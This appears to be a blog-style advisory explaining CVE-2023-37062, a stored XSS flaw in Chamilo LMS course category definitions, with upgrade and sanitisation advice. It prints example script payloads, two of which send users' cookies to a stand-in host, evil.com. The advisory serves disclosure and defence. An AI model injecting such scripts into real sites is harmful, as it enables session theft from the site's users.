Chamilo LMS is a popular open-source Learning Management System used by thousands of educational organizations worldwide. However, even trusted software can have flaws, and CVE-2023-37062 highlights a critical security issue. If you’re using Chamilo version 1.11.x up to 1.11.20, your system could be exposed to Cross-Site Scripting (XSS) attacks via course categories’ definitions—even if you thought only admins could change those.

Below, you’ll find all you need to know about this vulnerability, how it works, why it matters, an example exploit, and where to get more details.

What is CVE-2023-37062?

CVE-2023-37062 is a stored XSS vulnerability. It affects Chamilo 1.11.x up to 1.11.20. The problem is that administrators can inject malicious JavaScript code into course categories’ definitions, which is later executed in the browser of anyone viewing that category.

Why is it a problem if only admins can do this?

Ideally, you trust your admins. But:

Credentials are often reused or shared across organisations, so an admin login may be in more hands than you expect.

Plus, XSS means users can have cookies stolen, sessions taken over, malware run, or browser-based attacks launched.

Where’s the flaw?

When an admin creates or edits a “course category” in Chamilo, there’s a field called “Definition.” Chamilo does not sanitize the HTML or JavaScript code entered into this field, so any script entered is stored in the database and shown to users as-is on the categories page.

Let’s see a simple code snippet an attacker might use:

<script>
  alert('XSS via category definition!');
  // Or send cookies: new Image().src='https://evil.com/'+document.cookie
</script>


Then visit the course categories list: the alert pops up.

This works because Chamilo saves and displays whatever you put in that field, without checking for scripts.

Exploit in the Wild

If a malicious admin (or someone who steals an admin password) does this and replaces the sample code with actual code to steal cookies or session tokens, they could take over any user who visits the page—including teachers, students, or even other admins.

Example payload to grab cookies

<script>
  fetch('https://evil.com/steal?c='+document.cookie);
</script>

How to Fix & Protect Your Site

Chamilo 1.11.21 and later should sanitize the input, fixing the XSS bug (see official security advisory).
If you’re on 1.11.20 or earlier, upgrade now.

Temporary workaround:
If you can’t upgrade, make sure only genuinely trusted people have admin rights.

Alternatively, filter or strip HTML from that field by editing the Chamilo code:

<?php
// Example: in main/admin/course_category_add.php or similar
// Encode <, >, quotes and & as HTML entities before storing, so the browser shows them as text rather than running them
$definition = htmlspecialchars($_POST['definition'] ?? '', ENT_QUOTES, 'UTF-8');

Original References

- Chamilo official advisory
- NVD listing for CVE-2023-37062
- Chamilo LMS download and changelog

Summary

CVE-2023-37062 lets Chamilo admins inject XSS through the course category definition, affecting all users who view those categories. This is serious for any school, university, or training provider using Chamilo. Patch your system, and keep an eye on privilege levels even among admins.

> Always keep your learning platform up to date!
> For more details, check the references above and stay secure.


*Security research and guide by ChatGPT. Please use responsibly and inform others if you use Chamilo LMS!*

Timeline

Published on: 07/07/2023 17:15:00 UTC
Last modified on: 07/12/2023 20:50:00 UTC